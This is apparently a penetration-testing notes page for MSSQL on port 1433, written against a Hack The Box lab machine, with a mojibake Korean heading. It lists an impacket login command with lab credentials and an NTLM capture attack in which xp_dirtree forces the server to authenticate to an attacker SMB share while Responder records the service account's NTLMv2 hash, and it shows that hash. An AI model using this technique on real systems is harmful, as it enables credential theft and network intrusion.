1433 - MSSQL

python3 mssqlclient.py sequel.htb/PublicUser:GuestUserCantWrite1@10.10.11.202 
mssqlclient.py <user>@<FQDN/IP> -windows-auth 	Log in to the MSSQL server using Windows authentication.

#NTLM ๊ณต๊ฒฉ
SQL (PublicUser  guest@master)> xp_dirtree \\10.10.14.28\fake\shares
โ”Œโ”€โ”€โ”€(root@kali-container-upgrade)-[~/tools/impacket]
โ””โ”€# sudo responder -I tun0          
 [SMB] NTLMv2-SSP Hash     : sql_svc::sequel:d8abc45c42aa6df4:1DCB4972F44FAA76F45CA0C630FAB14F:0101000000000000001753E2A4C3DA01B468CA1F9C63BF6E000000000200080058004B005900350001001E00570049004E002D0033004F003100530059003300300031004F0051004D0004003400570049004E002D0033004F003100530059003300300031004F0051004D002E0058004B00590035002E004C004F00430041004C000300140058004B00590035002E004C004F00430041004C000500140058004B00590035002E004C004F00430041004C0007000800001753E2A4C3DA010600040002000000080030003000000000000000000000000030000095292662B410667D24E4AAF35AB95EBD65B52439E120083869D977235AF1B2220A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00320038000000000000000000               
 #get Hash
Previous623/UDP - IPMINext2049 - NSF

Last updated